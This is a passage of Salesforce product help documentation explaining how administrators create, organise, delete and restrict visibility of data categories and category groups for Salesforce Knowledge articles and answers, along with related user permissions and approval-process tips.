PDAs is now located.

NoYesComputers

PDAs has moved to the branch of the category hierarchy where you
have been granted access.

YesNoConsumer
Electronics

Example: How Changing the Hierarchy Affects Article Classification

Classifying an article with a parent category implicitly grants access to that category's children. You cannot explicitly apply
both a parent category and one of its children to an article. From the article edit page, selecting a parent category grays out its
child categories—you cannot select them in addition to the parent category. Salesforce respects this fact when you move a
category to a new parent. It prevents explicitly adding a child category to an article when the new parent category is already
present.

In the example depicted above, the category PDAs moves from the original parent category Computers to the new parent
category Consumer Electronics. As a result, articles' classifications may or may not change:

• Articles formerly classified with both Consumer Electronics and PDAs lose PDAs, because having Consumer Electronics
now implies having PDAs.

• Articles formerly classified with only Consumer Electronics but not PDAs do not change. Access to PDAs is now implied.
• Articles formerly classified with only PDAs, but not Consumer Electronics, retain PDAs.

See Also:
What are Data Categories?
Managing Data Categories
Adding Data Categories to Category Groups
Deleting Data Categories
Keyboard Shortcuts For Data Categories
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Keyboard Shortcuts For Data Categories

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Use the following keyboard shortcuts to work quickly with data categories.

Keyboard ShortcutActionTask

ENTERAdd a sibling to the selected categoryAdding a category

ENTER+TABAdd a child to the selected category

ESCClose the Add Category field

ENTERSave changes in the Add Category field

SPACEBAROpen the Edit Category field for the selected categoryModifying a category

ESCClose the Edit Category field

ENTERSave changes in the Edit Category field

TABDemote a category down one level, as a child of the
sibling currently above it

Demoting or promoting a
category

SHIFT+TABPromote a category up one level, as a sibling to its
current parent

DELETEDelete the selected category and its childrenDeleting a category

UP ARROWMove the focus up in the category hierarchyNavigating in the category
hierarchy

DOWN ARROWMove the focus down in the category hierarchy

LEFT ARROWCollapse children in a parent category

RIGHT ARROWExpand children in a parent category

CTRL+ZUndo the last actionCanceling or repeating an
action

CTRL+YRedo the last action
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Keyboard ShortcutActionTask

CTRL+SSave the last changes in the category hierarchySaving the changes

See Also:
Managing Data Categories
Adding Data Categories to Category Groups
Modifying and Positioning Data Categories
Deleting Data Categories

Deleting and Undeleting Category Groups

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Warning:  Deleting a category group deletes all of its categories and removes all associations between the categories
and articles or questions. Read this entire topic carefully to understand the consequences of deleting category groups.

To delete a category group:

1. From Setup, click Customize > Data Categories.
2. Hover your cursor over the category group name.

3. Click the Delete Category Group icon ( ).
4. Select the checkbox in the confirmation dialog, then click OK.

Consequences of Deleting Category Groups

Deleting a category group:

• Moves it to the Deleted Category Groups section, which is a recycle bin. You can view items in this section but not edit
them. It holds category groups for 15 days before they are permanently erased and cannot be recovered. During the 15–day
holding period, you can either restore a category group, or permanently erase it immediately.

• Deletes all categories within that group.
• Removes all associations between the group's categories and articles or questions.
• Removes all associations between the group's categories and visibility.
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• As applicable, removes the category drop-down menu from the Articles tab in all channels, the Article Management tab,
and your company's public knowledge base.

Undeleting Category Groups

To restore a deleted category group:

1. In the Removed Category Groups section, hover your cursor over the category group name.

2. Click the Undelete Category Group icon ( ).

The category group moves to the Category Groups section as an inactive category group, and associations with articles,
questions, and visibility are restored.

See Also:
Creating and Modifying Category Groups
Managing Data Categories

Creating and Modifying Category Groups

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Category groups can be used by Salesforce Knowledge (articles) or answers communities (questions). In both cases, category
groups are containers for individual data categories. For example, a Contracts category group might contain Fixed Price, Cost
Reimbursement, and Indefinite Delivery categories. For more information, see What are Data Categories? on page 2241

To create or edit a category group:

1. From Setup, click Customize > Data Categories.
2. To create a new category group, click Create New in the Category Groups section. By default, you can create a maximum

of five category groups and three active category groups. Contact salesforce.com to request additional category groups.

To edit an existing category group, hover your cursor over the category group name and then click the Edit Category

Group icon ( ).

3. Specify the Group Name. This name appears as the title of the category drop-down menu on the Article Management
and Articles tabs, and, if applicable, in the public knowledge base. The Group Name does not appear on the Answers tab.

4. Optionally, modify the Group Unique Name. This is a unique name used to identify the category group in the SOAP
API.

5. Optionally, enter a description of the category group.
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6. Click Save. You receive an email after the save process completes.

You can now add categories to your category group. When you create a new category group, Salesforce automatically creates
a top-level category in the group named All. Optionally, double-click All to rename it.

Activating Category Groups

When you add a new category group, it's deactivated by default and only displays on the administrative setup pages for Data
Categories, Roles, Permission Sets, and Profiles. Keep your category groups deactivated to set up your category hierarchy and
assign visibility. Until you manually activate a category group, it does not display in Salesforce Knowledge or your answers
community In addition to activating the category group, for answers communities you must assign the category group to a
zone before the categories are visible on the Answers tab.

To activate a category group so it is available to users, move the mouse pointer over the name of the category group and click

the Activate Category Group icon ( ).

See Also:
Managing Data Categories
Adding Data Categories to Category Groups
Deleting Data Categories
Managing Articles and Translations
About Category Group Visibility
Managing Data Categories
Adding Data Categories to Category Groups
Deleting and Undeleting Category Groups
Managing Articles and Translations
About Category Group Visibility

Adding Data Categories to Category Groups

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Administrators can create data categories for Salesforce Knowledge articles or questions in a zone to help users classify and
find articles or questions. Administrators can also use data categories to control access to articles and questions. For more
information, see What are Data Categories? on page 2241.

By default, you can create up to 100 categories in a data category group and have up to 5 levels in a data category group
hierarchy. To request additional categories or hierarchy levels, contact salesforce.com.
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Note: Because only first-level data categories display on the Answers tab, when creating data categories for a portal
or community ensure that the categories you want visible have a sibling relationship and not a parent-child relationship.

To add categories to a category group:

1. From Setup, click Customize > Data Categories.
2. Click the category group name.
3. Click a category that is directly above where you want to add a category (a parent), or at the same level (a sibling).
4. Click Actions, then select an action: Add Child Category or Add Sibling Category.
5. Enter a category name.

If possible, Salesforce automatically reuses the name you entered as the Category Unique Name, a system field which
the SOAP API requires.

6. Click Add. Alternatively, press Enter.
7. Click Save. Save your changes frequently. The more actions you perform before clicking Save, the longer it takes to save.

Tip:  By default, all Salesforce Knowledge users and zone members can see all categories within an active category
group. You can restrict category visibility after you have set up your data categories to ensure that users only access
articles and questions that you want them to see.

See Also:
Managing Data Categories
Modifying and Positioning Data Categories
Deleting Data Categories
Keyboard Shortcuts For Data Categories

Prefilter Articles with Data Category Mapping — Beta
Data category mapping allows you to prefilter articles based on case information in the Article tab, advanced search, and the
article sidebar component based on case information.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To map data category groups

Important:  Prefiltering articles based on case information is only supported in text and picklist fields.
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Data category mapping allows you to define which articles appear in the Articles tab, advanced search, and the article sidebar
component based on case information. For information on data categories, see What are Data Categories? on page 2241

To implement data category mapping, select which case fields map to which data category groups and set a default data category
for cases that have no value for the mapped fields.

1. From Setup, click Customize > Knowledge > Data Category Mappings.
2. In the Case Field column, use the drop-down list to add a field.
3. In the Data Category Group column, use the drop-down list to map the information from the lookup field to a data

category group.
4. In the Default Data Category column, use the drop-down list to assign a data category when the field value does

not match any categories from the category group.
5. Click Add.

For example, you can map a products custom case field to a products data category group to filter the articles for the customer's
products.

Editing Category Group Visibility
Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Setup and Configuration”To view role details:

“Manage Users”To edit and delete roles, permission sets, or profiles:

“View Setup and Configuration”To view users:

“Manage Users”To edit users:

“View Data Categories”To view categories:

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

To edit data category visibility settings:

1. Go to the data category visibility settings page in Setup:

• For roles: click Manage Users > Roles.
• For a role on the Customer Portal or partner portal: click Manage Users > Users.
• For permission sets: click Manage Users > Permission Sets.
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• For profiles: click Manage Users > Profiles.

2. Open a data category group for edit.

• For roles, in the Category Group Visibility Settings related list, click Edit next to the category group you want to
modify.

• For permission sets and profiles:

a. Click on a permission set or profile name.
b. Click Data Category Visibility.
c. Click Edit next to the data category group you want to assign.

3. Select a visibility setting:

DescriptionVisibility Setting

Users can see all categories in the category group. This option is only available for the topmost role
in the role hierarchy. When you create a new category group, its visibility is defaulted to All
Categories.

All Categories

Users cannot see any categories in the category group.None

Users see your custom selection of categories. For roles, you can choose from the categories that are
visible to the parent role. If the parent role's visibility changes to be less than its child's visibility,
the child role's category visibility is reset to its parent's category visibility.

To select categories, double-click the category in the Available Categories box. Alternatively,
select a category and then click Add. Selecting a category implicitly includes its child and parent

Custom

categories as well. Categories that are grayed out are not available for selection because their parent
has already been selected.

Note:  If you are customizing a role, permission set, or profile that was previously set to
All Categories, you must first remove All from the Selected Categories box before
you can select specific categories.

4. Click Save.

Implementation Tips

• When you create a new category group, its visibility is defaulted to All Categories.
• When you grant visibility to a category, you also grant visibility to its child and parent categories. If you want to give access

to all categories in a branch of the category hierarchy, select the top level category All Categories.
• Users who are not assigned to a category’s visibility by role, permission set, or profile can only see uncategorized articles

and questions unless:

◊ The user has the “View all Data” permission.
◊ A category group has been made visible to all users in Setup at Customize > Data Categories > Default Data Category

Visibility.

• For role-based visibility, Customer Portal users and partner portal users inherit the role assigned to their account managers
by default. You can change the category group visibility settings for each portal role.
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Best Practices

• Keep your category groups deactivated to set up your category hierarchy and assign visibility. Until you manually activate
a category group, it does not display in Salesforce Knowledge or your answers community

• For role-based visibility, always set up data category visibility in a top-down approach from the top of the role hierarchy
down to the bottom. Give the highest roles the most visibility and give subordinate roles reduced visibility.

See Also:
About Category Group Visibility
Managing Data Categories
Examples of Category Group Visibility Settings for Articles

About Category Group Visibility

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Setup and Configuration”To view role details:

“Manage Users”To edit and delete roles, permission sets, or profiles:

“View Setup and Configuration”To view users:

“Manage Users”To edit users:

“View Data Categories”To view categories:

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

Enforcement of Visibility Settings

To ensure that users obtain a wide range of relevant information, category group visibility is broadly interpreted. Setting a
category as visible makes that category and its entire directly related family line—ancestors, immediate parent, primary children,
other descendants—visible to users. For example, consider a Geography category group with continents such as Asia and
Europe at the top level, various countries at the second level, and cities at the third level. If France is the only visible category
selected, then you can see articles classified with Europe, France, and all French cities. In other words, you can see categories
that have a direct vertical relationship to France but you cannot see articles classified at or below Asia and the other continents.
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Note:  Only the first-level categories in the category group are visible on the Answers tab. In the Geography example,
only the continent categories appear on the Answers tab; therefore, if France is the category selected as visible in
category group visibility settings, zone members can see questions classified with Europe.

Category group visibility settings are enforced on the Answers tab, the Article Management tab, the Articles tab in all channels
(internal app, partner portal, Salesforce.com Community, and Customer Portal), and the public knowledge base. In the
following areas, users only see the categories that their visibility settings allow:

• On the Article Management tab, when creating or editing articles
• On the Article Management tab and the Articles tab, the category drop-down menu for finding articles
• On the Answers tab, the categories listed below the zone name

Initial Visibility Settings

If role, permission set, or profile data category visibility has not been set up, all users can see all data categories. However, if
data category visibility is set up, users who are not assigned data category visibility by a role, permission set, or profile, only
see uncategorized articles and questions unless you make the associated categories visible by default. Role, permission set, and
profile visibility settings restrict default visibility settings; in other words, even if a data category is visible by default, it cannot
be seen by a user whose role restricts access to that data category.

Note:

If data category visibility is defined with roles, permission sets, and profiles, Salesforce uses a logical OR between the
definitions to create a visibility rule for each user.

Inheritance of Role-Based Visibility Settings

Child roles inherit their parent role's settings and are kept in sync with changes to the parent role. You can customize and
reduce the child role's visibility, but you cannot increase it to be greater than that of the parent role. By default, Customer
Portal users and partner portal users inherit the category group visibility settings assigned to their account managers. You can
change the category group visibility settings for each portal role. Because high-volume portal users don't have roles, you must
designate visibility settings by permission set or profile before these users can view categorized articles and questions.

Visibility of Categorized Articles

A user can see an article if he or she can see at least one category per category group on the article. For example, consider an
article that is classified with California and Ohio in the Geography category group and Desktop in the Products category
group:

• If you have visibility on Ohio and Desktop (but not California), you can see the article.
• If you don't have visibility on either California or Ohio but do have visibility on Desktop, you do not see the article.
• If you have visibility on California but not Desktop, you do not see the article.

Revoked Visibility

Data category visibility can be revoked (set to None) for a particular category group. Users in the target role, permission set,
or profile can only see articles and questions that aren't classified with a category in that category group. For example, if a
user's role has revoked visibility in the Geography category group but visibility to the Products category group, he or she can
only see articles that have no categories in Geography and are classified with a category in Products. Because an answers zone
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can only be assigned to one category group, if the Geography category group was assigned to the zone and a member's role
visibility was revoked for that group, the member could only see uncategorized questions.

See Also:
What are Data Categories?
Editing Category Group Visibility
Viewing Category Group Visibility on Roles
Modifying Default Data Category Visibility
Examples of Category Group Visibility Settings for Articles

How Category Visibility Differs from Other Salesforce Models

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

These settings are unique to articles and questions and differ from other Salesforce models:

Exclusive to articles and questions

Access to articles and questions are determined by category group visibility settings. Although they are standard objects,
articles and questions do not have organization-wide defaults, sharing rules, manual record sharing, or object-level
permissions like “Create” or “Read.”

Access

Category group visibility settings are based on the user’s role, permission set, or profile. Child roles cannot see more
categories than their parent role. To change a user's visibility to categories and therefore categorized articles and questions,
you must change the visibility settings for the user's role, permission set, or profile, or, if custom data category visibility
is not assigned, make certain categories visible to all users.

Broad interpretation of visibility settings

To ensure that users obtain a wide range of relevant information, category group visibility is broadly interpreted. Setting
a category as visible makes that category and its entire directly related family line—ancestors, immediate parent, primary
children, other descendants—visible to users. For example, consider a Geography category group with continents such
as Asia and Europe at the top level, various countries at the second level, and cities at the third level. If France is the
only visible category selected, then you can see articles classified with Europe, France, and all French cities. In other
words, you can see categories that have a direct vertical relationship to France but you cannot see articles classified at or
below Asia and the other continents.
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Note:  Only the first-level categories in the category group are visible on the Answers tab. In the Geography
example, only the continent categories appear on the Answers tab; therefore, if France is the category selected
as visible in category group visibility settings, zone members can see questions classified with Europe.

See Also:
Managing Data Categories
About Category Group Visibility
Viewing Category Group Visibility on Roles
Examples of Category Group Visibility Settings for Articles

Modifying Default Data Category Visibility

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view categories:

“Manage Data Categories”To manage data categories:

“Manage Data Categories”To assign default category groups:

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

To modify the default visibility for data categories:

1. From Setup, click Customize > Data Categories > Default Data Category Visibility. All active and inactive category
groups are listed.

2. Pick a category group and click Edit.
3. Choose All Categories to make all the categories in the category group visible by default, None to make none of the

categories visible by default, or Custom to make some of the categories visible by default.
4. If you chose Custom, move categories from the Available Categories area to the Selected Categories area as needed.

Selecting a category implicitly includes its child and parent categories as well. Move categories from the Selected Categories
area back to the Available Categories area to remove default visibility.
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For important information about how visibility settings are applied, see About Category Group Visibility on page 2258.

See Also:
What are Data Categories?
How Category Visibility Differs from Other Salesforce Models

Viewing Category Group Visibility on Roles

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Setup and Configuration”To view role details:

“Manage Users”To edit and delete roles, permission sets, or profiles:

“View Setup and Configuration”To view users:

“Manage Users”To edit users:

“View Data Categories”To view categories:

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

To understand the settings and their impact, see About Category Group Visibility on page 2258.

Viewing a Role's Category Group Visibility

To view a role's category visibility setting, from Setup, click Manage Users > Roles, and select a role. To view the category
visibility settings for a Customer Portal or partner portal role, from Setup, click Manage Users > Users and click the name of
the role.

The Category Group Visibility Settings related list summarizes which categories users in the role can see, according to category
group. The following table explains the possible values in the Visibility column of the related list:

DescriptionVisibility

Users can see all categories in the category group. This option
is only available for the topmost role in the role hierarchy.

All Categories

When you create a new category group, its visibility is
defaulted to All Categories.
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DescriptionVisibility

Users cannot see any categories in the category group.None

Users can view a selection of categories in the category group.Custom

In the Category Group Visibility Settings, you can:

• Click a category group to view its setting details.
• Click Edit next to a category group to modify its visibility settings.

See Also:
Managing Data Categories
Examples of Category Group Visibility Settings for Articles

Modifying Category Group Assignments in Salesforce Knowledge

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To modify category groups assignments in Salesforce
Knowledge:

Salesforce Knowledge uses data categories to classify articles. Authors can assign up to eight data categories from one category
group to an article so that users searching for articles can find and filter by category. For more information, see What are Data
Categories? on page 2241.

Data categories are organized by category group. After creating category groups, you can decide which groups should be used
for Salesforce Knowledge articles. For example, if your organization uses both the Answers and Salesforce Knowledge, you
may want one category group to be used by the answers community and two other category groups to be used for articles.
Answers and articles can use the same category group.

By default, all the category groups you create are assigned to Salesforce Knowledge. To modify the assignment:

1. From Setup, click Customize > Knowledge > Data Category Assignments. A list of all category groups appears.
2. Click Edit and move any category groups that you don't want available for articles from the Selected Category Groups list

to the Available Category Groups list. Later, you can choose to make a hidden category group visible.
3. Click Save.

You receive an email after the save process completes. Authors can now assign categories in the selected groups to articles on
the Article Management tab. Note that authors can only access categories if the category group is active and the author's data
category visibility settings provide access to the category.
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Examples of Category Group Visibility Settings for Articles

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Data category visibility can be set with roles, permission sets, or profiles. Data category visibility determines the individual
data categories, categorized articles, and categorized questions that a user can see. There are three types of visibility:

• All Categories: All categories are visible

• None: No categories are visible

• Custom: Selected categories are visible

With custom data category visibility, users can only see the data categories permitted by their role, permission sets, or profile.

These examples are based on two sample category groups, Products and Geography:

Note:  Although category group visibility settings are available with answers communities (questions) and Salesforce
Knowledge (articles), the examples below apply to articles only. Answers communities support one category group
and one data category per question.

Products Category Group

• All Products

◊ Consumer Electronics

- Cameras

- Audio

- Printers

◊ Enterprise Electronics

- Routers

- Switches

- PEX

◊ Computers

- Laptops

- Desktops

- PDAs

Geography Category Group

• All Countries

◊ Americas

- USA
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- Canada

- Brazil

◊ Asia

- China

- Japan

- India

◊ Europe

- France

- United Kingdom

- Poland

Example 1: A Role Hierarchy

In this example, the Acme Electronics organization manufactures hardware and provides customer support for both consumers
and enterprises. The Engineering department is organized by products. The Support department is organized geographically.
Europe and the Americas are managed by corporate teams, but Asia is outsourced. Within the corporate and outsourced teams,
there are subteams dedicated either to consumer or enterprise support.

The table below shows the categories visible to each role in the Acme Electronics organization, and states whether the visibility
settings are inherited from the parent role or custom.

Visible Product CategoriesVisible Geographic CategoriesAcme Electronics Role Hierarchy

All ProductsAll CountriesCEO

All Products

Inherit from CEO

All Countries

Inherit from CEO

VP of Engineering

Consumer Electronics

Custom

All Countries

Inherit from VP of Engineering

Consumer Engineering
Team

Enterprise Electronics

Custom

All Countries

Inherit from VP of Engineering

Enterprise Engineering
Team

Computers

Custom

All Countries

Inherit from VP of Engineering

Computers Engineering
Team

All Products

Inherit from CEO

All Countries

Inherit from CEO

VP of Support

All Products

Inherit from VP of Support

Europe, America

Custom

VP of Corporate Support

Consumer Electronics, Computers

Custom

Europe, America

Inherit from VP of Corporate Support

Director of Corporate
Consumer Support
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Visible Product CategoriesVisible Geographic CategoriesAcme Electronics Role Hierarchy

Enterprise Electronics, Computers

Custom

Europe, America

Inherit from VP of Corporate Support

Director of Corporate
Enterprise Support

All Products

Inherit from VP of Support

Asia

Custom

Outsourced Support

Consumer Electronics, Computers

Custom

Asia

Inherit from Outsourced Support

Consumer Support Team

Enterprise Electronics, Computers

Custom

Asia

Inherit from Outsourced Support

Enterprise Support Team

Example 2: Article Visibility

The table below is an in-depth example of how category visibility settings restrict what users see. This example has three
sample users whose category settings are noted in parentheses.

Table 3: Example: How Category Visibility Settings Restrict What Users See

When User 3's visibility is
France/None, the category
is:

When User 2's visibilty
isAmerica/All products, the
category is:

When User 1's visibility isAll
countries/Computers, the
category is:

Categories

NOT VISIBLEVISIBLEVISIBLEAll countries/Laptop

NOT VISIBLEVISIBLEVISIBLECanada/Computers

NOT VISIBLEVISIBLEVISIBLEUSA/All products

NOT VISIBLENOT VISIBLENOT VISIBLEEurope/Switches

VISIBLENOT VISIBLEVISIBLEEurope/No Categories

User 1: The user must be granted visibility in each category that classifies the article, or each category that classifies the article
must be visible by default. In this example, User 1 can see Europe, because Europe is the child of All Countries, but he cannot
see Switches, because Switches does not belong to Computers. That's why User 1 cannot see articles classified with
Europe/Switches.

User 2: When a category is made visible to a user through custom settings or is made visible by default, its child and parent
categories are implicitly included; therefore, User 2 can see articles categorized with All Countries because it is the parent
category of America. He can also see Articles classified with USA because it is the child of America.
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User 3: If a user has no access to the whole category group, he can only see articles that are not categorized in that group. User
3 cannot see the articles categorized with All countries/Laptop because he has no visibility in the category group that includes
Laptop, but he can see articles categorized with Europe/No categories.

See Also:
Managing Data Categories
About Category Group Visibility
Viewing Category Group Visibility on Roles
Editing Category Group Visibility
How Category Visibility Differs from Other Salesforce Models

Granting Permissions for Salesforce Knowledge Users
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Users”To create or edit users:

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

User permissions control access to different features in Salesforce Knowledge. We recommend using permission sets or custom
profiles to grant users the permissions they need. For example, you might want to create a permission set called “Article
Manager” that includes the permissions needed to create, edit, publish, and assign articles.

When creating Salesforce Knowledge profiles, keep the following in mind.

• Users who will create article types, manage article actions, and modify settings from Setup, in Customize > Knowledge
need the “Manage Salesforce Knowledge” permission. This permission is on by default in the System Administrator profile.

• Users who will search for and view articles from the Articles tab need the “Read” permission for the article types they need
to access.

• Users who will edit draft articles, manage the publishing process, or manage the translation process need the “Manage
Articles” permission and the appropriate article type permissions. “Manage Articles” is on by default in the System
Administrator profile.

• Users with the “Manage Articles” permission are assigned all article actions automatically. Article actions allow users to
do things like publish and archive articles or manage the translation process.

• Users who will create data categories need the “Manage Data Categories” permission. This permission is on by default in
the System Administrator profile.

• Users who will import articles or import or export translations need the “Read,” “Create,” “Edit,” and “Delete” permissions.

Refer to this table for details on permissions associated with Salesforce Knowledge functionality. The full permission names
are as follows:

• Manage Salesforce Knowledge = MSK
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• Manage Articles = MA
• Manage Knowledge Article Import/Export = MKAIE

OtherArticle Type-Specific PermissionsPermissions

Article
Action

DeleteEditCreateReadMKAIEMAMSKSalesforce Knowledge
Functionality

Create article type

Manage article actions

Create new article from case using
the simple editor

Create new article from case using
the standard editor

Search articles from case and
attach articles to case

Create new article from answer

Search for and read articles from
Article tab

Create or edit article from Article
Management tab

Edit draft article from Article
Management tab

Delete article (version or entire)
from Article Management tab

Publish article from Article
Management tab

Assign article from Article
Management tab

Edit published or archived article

Archive article from Article
Management tab

Submit articles for translation

Delete translated articles

Publish translated articles

Edit translated articles

Import articles
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OtherArticle Type-Specific PermissionsPermissions

Article
Action

DeleteEditCreateReadMKAIEMAMSKSalesforce Knowledge
Functionality

Import and export translated
articles

See Also:
Setting Up Salesforce Knowledge
Granting Permissions for Salesforce Knowledge Users
Creating and Assigning Salesforce Knowledge Users and Groups

Overview of Setting Up Salesforce Knowledge Users

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Users”To create or edit users:

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

To give people in your company access to various features in Salesforce Knowledge, you need to create Knowledge user profiles
with the appropriate user permissions, and then assign users to these profiles. In addition, you need to specify which users in
your company areSalesforce Knowledge users. Optionally, you may want to create public groups for certain article actions,
such as publishing, translating, or archiving.

• Granting Permissions for Salesforce Knowledge Users

• Creating and Assigning Salesforce Knowledge Users

• (Optional) Assigning Article Actions to Public Groups

See Also:
Setting Up Salesforce Knowledge
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Creating and Assigning Salesforce Knowledge Users and Groups

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Users”To create or edit users:

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

Creating and Assigning Salesforce Knowledge Users

The Salesforce Knowledge feature license is indicated by the Knowledge User checkbox on the user detail page. If it does
not appear, verify that your organization has purchased enough feature licenses.

To create or assign Salesforce Knowledge users:

1. From Setup, click Manage Users > Users.
2. Click Edit next to the user's name or click New to create a new user.
3. If you are creating a new user, complete all the required fields.
4. Select the Knowledge User checkbox.
5. Verify that the user has the required permissions. See Granting Permissions for Salesforce Knowledge Users.
6. Click Save.

Assigning Article Actions to Public Groups

The “Manage Articles” user permission provides Salesforce Knowledge users with access to all the article actions available
from the Article Management tab, including publishing, translating, and archiving articles. You can control article action
access by assigning public groups to article actions. Then, you add Salesforce Knowledge users who need to perform an article
action to the article action's public group. For example, you might create a public group called Superusers and assign it to the
Delete Translated Articles action. Only article managers who are members of Superuser can delete translated articles.  See
Assigning Article Actions to Public Groups for more information on limiting access to article actions by assigning them to
public groups.

See Also:
Setting Up Salesforce Knowledge

2270

Granting Permissions for Salesforce Knowledge UsersAdding a Knowledge Base



Customizing Salesforce Knowledge
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

“Manage Synonyms”To manage synonyms:

“Manage Data Categories”To create data categories:

Depending on how you want to customize Salesforce Knowledge, such as integrating the knowledge base with cases or giving
portal users access to articles, complete the following optional steps.

• Set up workflow rules or approvals processes  for some or all article types to help your organization manage article creation
and publication.

• Enable multiple languages if your organization will translate and publish articles in more than one language.
• If you have an existing knowledge base, import your articles into Salesforce Knowledge.
• Enable Salesforce Knowledge in the Customer Portal to make articles visible to portal users.
• Enable Salesforce Knowledge in the partner portal to make articles visible to portal users.
• Create a synonym group to allow Salesforce Knowledge users to search for articles using synonyms as keywords.
• Add the Articles related list to case page layouts. The Articles related list lets users search for articles while working on a

case. You can also allow case users to:

◊ Attach PDF versions of articles to case emails.
◊ Create articles when closing a case.
◊ View a list of suggested articles based on case information.

• To allow users to follow articles in Chatter, enable feed tracking for article types.
• If you want visitors to your public website to view Salesforce Knowledge articles, install the Public Knowledge Base app from

the AppExchange. To install, configure, and customize your public knowledge base with this package, see the Public
Knowledge Base AppExchange App Guide available on the AppExchange.

See Also:
Setting Up Salesforce Knowledge
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Salesforce Knowledge Workflow Rules and Approval Processes

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Setup and Configuration”To view workflow rules and approval processes:

“Customize Application”To create or change workflow rules and approval processes:

Creating workflow rules and approval processes lets your organization automate many of the tasks involved with managing
its knowledge base. When implementing Salesforce Knowledge, you can create workflow rules and approval processes for
some or all of the article types used by your organization.

Workflow rules let you create email alerts, update fields, or send outbound API messages when an article meets certain criteria.
For example, you could create a workflow rule that sends an email alert to the article type owner when a new article is created
from a case. Note that tasks are not supported by article type workflow.

Approval processes automate the approval of articles. When implemented with Salesforce Knowledge, approval processes give
you additional control over the content of your articles and the process used to approve them. For example, you can create a
process that requires legal and management teams to approve articles containing sensitive information.

Note:  Tasks aren't available for article type workflow rules.

Tips for Creating Approval Processes

Keep the following in mind when creating approval processes for article types.

• Before you create an approval process, determine which approval process wizard to use.

• Adding an approval process to an article type lets your organization ensure that the required reviewers approve the article
before it's published. When an approval process is enabled for an article's article type, the Approval History related list
displays on the article details page.

• When creating an approval process, change the final approval action to “Unlock the record for editing” to allow users to
publish the article.

• Articles aren't published automatically at the end of an approval process. Users must click Publish... to make the article
available in the publishing channel(s).

• When an approval process is associated with an article type, users with the “Manage Articles” permission might see both
the Publish... and the Submit for Approval buttons on an article's detail page. (Which buttons they see is determined by
both permissions and article actions). These users can publish an article without submitting it for approval. To prevent
this from affecting many users, assign the “Publish Articles” article action to a limited group of users instead of giving it
to all users with the “Manage Articles” permission. For more information, see Assigning Article Actions to Public Groups
on page 2238. You'll still want to make sure that the users with direct publishing capability know which articles need approval
before publication.

• Article approvers require the “Manage Articles” permission and at least the “Read” permission on the article type associated
